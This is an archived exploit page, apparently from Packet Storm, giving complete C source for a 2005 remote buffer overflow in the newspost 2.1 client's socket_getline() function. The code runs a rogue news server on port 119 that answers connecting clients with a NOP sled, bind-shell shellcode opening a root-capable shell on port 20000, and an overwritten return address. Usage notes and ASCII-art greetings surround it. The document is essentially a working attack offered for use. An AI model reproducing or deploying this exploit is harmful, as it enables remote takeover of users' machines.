Newspost socket_getline() remote buffer overflow exploit.
a6081f4aa3eed364766ff408136678d080d915d86e1294344825ed9ec87208cc/*
02/03/2005
NOTES: -Newspost "socket_getline()" Buffer Overflow Exploit
Client Usage
------------
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n cyber -s tronic
<file>
Greetz fly to my girlfriend YASMIN H.
¼
¼M
M ¼MMM
MMm ¼MMMM
M$$MMm ¼MMMMM.
MM$$MMMMm MMMMMMMM
`MM$$MMMMMMm 4MMMM$$MM
MMM$$MMMMMMMMm ´MMMM$$MMM
MMM$$$MMMMMMMMm mMMMM$MMMM
`MMM$$$MMMMMMMm MMMM$MMMM´
MMMM$$$MMMMMMMm MMM$$MMM´
`MMMMMMMMMMMMMm MMMMMMM´
`MMMMMMMMMMMMMm MMMMMM
`MMMMMMMMMMMM MMMMM
`MMMMMMMMMM MMMMM
`MMMMMMMMMMMM
MMMMMMMMMMM
mmMMMMMMMMMMMMMMMMM
mmMMMMMMMMMMMMMMMMMMMMMM
¼MMM#MMMMMMMMMMMMMMMMMMMMm
4MMM<º >MMMMMMMMMMMMMMMMMMMM
MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMM
¼Mn ¼MMMMMMMMMMMMMMMMMMMMMMMMM ¼Mnn
nM `MMMMMMMMMMMMMMMMMMMMMM´ n¼
`¼ MMMMMMMMMMMMMMMMM¼ n´
MMMMMM¼
mtr¼
mMMM nmM mM
mM¼´ M ' M n
mM$ nM n¼MMn¼Ä
4M m ¼M N ¼ ¼`
m¼ `n¼ mM NM´ NM
mM mMm nm M´¼Mļ n¼Mm ¼n xnÄ, ¼ ¼n xnÄ ¼Mm Mn n¼ nM
nMm
mM `mMM´ nM M nM ,` ¼n´ y M ¼n´ y nM ¼ nM Ä Ä ¼
M¼ M' ¼Ä M n.,´ nm nM nM n M ¼ Ä ¼ n
MM¼ mM M nM Ä M´ n , nM ¼Ä nM M nM M M M´ M
n
MMM¼ M´ nM MÄÄM n¼nN ¼M nM ¼M `¼M´ ´¼ .N nM ¼nM´
M´
n´ cybertronic 2oo5
´ ________________
----------------------/
MMMMMMMMm mMMMMMMM¼
´MM$MMMMMMMMMm mMMMMMMMMM$MM`
MMMMMMMMMMMMMMMm mMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM
`MMMMMMMMMMMMMMMMMM MMMMMMMMMMM(c)MMMM´
ºÕÍÄúú just want to say love you dad! úúÄÍÕº
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 119
#define BACKLOG 5
//92 bytes bindcode port 20000
char scode[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int 80h
void cmd ( int connfd );
void header ();
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
header ();
printf ( "[*] Creating socket..." );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr )
);
printf ( "[*] Listening..." );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
for ( ; ; )
{
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr,
&clilen ) ) < 0 )
{
close ( listenfd );
exit ( 1 );
}
if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
printf ( "[*]" GREEN " Incomming connection from:\t %s\n" NORMAL,
inet_ntoa ( cliaddr.sin_addr ) );
cmd ( connfd );
}
close ( connfd );
}
}
void
cmd ( int s )
{
char in[1024], out[1200];
unsigned long ret = 0xbfffecb8;
bzero ( &out, 1200 );
memset ( out, 0x90, 956 ); //956
memcpy ( out + 956, scode, sizeof ( scode ) );
strcat ( out, "\x41\x41\x41\x41" );
strncat ( out, ( unsigned char* ) &ret, 4 );
printf ( "[*] Sending Bad Packet [ %u bytes ]...", strlen ( out ) );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL);
sleep ( 1 );
}
void
header ()
{
system ( "clear" );
printf ( RED "### " GREEN "# # " YELLOW "### " BLUE "### " RED "###
" GREEN "### " YELLOW "### " BLUE "### " RED "# # " GREEN "# "
YELLOW "###\n" NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "# # " BLUE "# " RED "# #
" GREEN " # " YELLOW "# # " BLUE "# # " RED "## # " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "### " BLUE "### " RED "###
" GREEN " # " YELLOW "### " BLUE "# # " RED "# # # " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "# " GREEN " # " YELLOW "# # " BLUE "# " RED "# #
" GREEN " # " YELLOW "# # " BLUE "# # " RED "# ## " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "### " GREEN " # " YELLOW "### " BLUE "### " RED "# #
" GREEN " # " YELLOW "# # " BLUE "### " RED "# # " GREEN "# "
YELLOW "###\n" NORMAL);
printf ( RED " cybertronic@gmx.net\n" NORMAL );
printf ( RED " ----------(c) 2005----------\n\n"
NORMAL );
printf ( "newspost-2.1\n\n" );
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed